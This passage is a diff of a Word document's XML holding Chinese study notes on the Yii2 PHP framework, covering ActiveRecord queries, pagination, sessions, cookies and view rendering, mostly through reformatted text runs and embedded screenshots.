-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11644,7 +11600,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -11722,7 +11677,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -11779,28 +11733,20 @@
             <w:pPr>
               <w:ind w:leftChars="200" w:left="420"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>$countries = Country::find()-&gt;orderBy('name')</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>-&gt;all();</w:t>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$countries = Country::find()-&gt;orderBy('name')-&gt;all();</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:leftChars="200" w:left="420"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -11865,28 +11811,20 @@
             <w:pPr>
               <w:ind w:leftChars="200" w:left="420"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>$co</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>untry = Country::findOne('US');</w:t>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$country = Country::findOne('US');</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:leftChars="200" w:left="420"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -11937,7 +11875,6 @@
             <w:pPr>
               <w:ind w:leftChars="200" w:left="420"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -11952,7 +11889,6 @@
             <w:pPr>
               <w:ind w:leftChars="200" w:left="420"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -12044,9 +11980,6 @@
           <w:p>
             <w:pPr>
               <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -12129,7 +12062,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -12144,13 +12076,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>'defaultPageSize' =&gt; 5,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  //</w:t>
+              <w:t>'defaultPageSize' =&gt; 5,  //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12176,13 +12102,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>'totalCount' =&gt; $query-&gt;count(),</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> //</w:t>
+              <w:t>'totalCount' =&gt; $query-&gt;count(), //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12195,7 +12115,6 @@
             <w:pPr>
               <w:ind w:firstLineChars="150" w:firstLine="315"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -12260,19 +12179,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">$countries </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Country::find()</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>-&gt;orderBy('name')</w:t>
+              <w:t>$countries Country::find()-&gt;orderBy('name')</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12453,13 +12360,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>'countries' =&gt; $countries,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  //</w:t>
+              <w:t>'countries' =&gt; $countries,  //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12471,7 +12372,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -12498,13 +12398,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>'pagination' =&gt; $pagination,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  //</w:t>
+              <w:t>'pagination' =&gt; $pagination,  //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12550,7 +12444,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -12616,9 +12509,6 @@
           <w:p>
             <w:pPr>
               <w:ind w:firstLineChars="100" w:firstLine="210"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -12629,8 +12519,6 @@
             <w:r>
               <w:t>：</w:t>
             </w:r>
-            <w:bookmarkStart w:id="2" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="2"/>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -12678,17 +12566,1236 @@
             <w:tcW w:w="6440" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>Session</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>处理</w:t>
+            </w:r>
+            <w:r>
+              <w:t>:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B68D937" wp14:editId="7D0A4FE2">
+                  <wp:extent cx="2400300" cy="2409825"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                  <wp:docPr id="25" name="图片 25"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId30"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2400300" cy="2409825"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>Cookie</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>处理</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06B44FF7" wp14:editId="52C65987">
+                  <wp:extent cx="3952240" cy="1193800"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+                  <wp:docPr id="26" name="图片 26"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId31"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="1193800"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>视图</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:t>模型</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6439"/>
+        <w:gridCol w:w="6440"/>
+        <w:gridCol w:w="6440"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>渲染视图的两种方式</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="028C0417" wp14:editId="74AA1352">
+                  <wp:extent cx="3951605" cy="340360"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+                  <wp:docPr id="27" name="图片 27"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId32"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="340360"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>在</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>一个视图中显示</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>另一个</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>视图</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55350C87" wp14:editId="24AE4AB2">
+                  <wp:extent cx="3951605" cy="272415"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="28" name="图片 28"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId33"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="272415"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>=========================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>activeRecoed</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>操作数据表的方法</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:t>where</w:t>
+            </w:r>
+            <w:r>
+              <w:t>条件</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>查询</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60D88B51" wp14:editId="6E658D59">
+                  <wp:extent cx="3952240" cy="1610995"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+                  <wp:docPr id="30" name="图片 30"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId34"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="1610995"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）数据</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>删除</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5346F6E6" wp14:editId="53C43CD7">
+                  <wp:extent cx="3819525" cy="695325"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+                  <wp:docPr id="31" name="图片 31"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId35"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3819525" cy="695325"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>添加</w:t>
+            </w:r>
+            <w:r>
+              <w:t>数据</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:t>直接创建模型类赋值保存即可</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="354F1318" wp14:editId="767F8D16">
+                  <wp:extent cx="1962150" cy="1762125"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                  <wp:docPr id="32" name="图片 32"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId36"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1962150" cy="1762125"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>修改</w:t>
+            </w:r>
+            <w:r>
+              <w:t>数据：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="420"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4873B783" wp14:editId="6CE38ADA">
+                  <wp:extent cx="3324225" cy="733425"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+                  <wp:docPr id="33" name="图片 33"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId37"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3324225" cy="733425"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>多表关联查询：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>hasMany/hasOne</w:t>
+            </w:r>
+            <w:r>
+              <w:t>设置关联关系并获取数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A515917" wp14:editId="21E4AEC0">
+                  <wp:extent cx="3952240" cy="327660"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="35" name="图片 35"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId38"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="327660"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>关联</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>查询缓存</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：使用完</w:t>
+            </w:r>
+            <w:r>
+              <w:t>unset</w:t>
+            </w:r>
+            <w:r>
+              <w:t>下，下次才会</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>从新</w:t>
+            </w:r>
+            <w:r>
+              <w:t>从数据库获取数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>关联</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>查询</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>多次</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>查询</w:t>
+            </w:r>
+            <w:r>
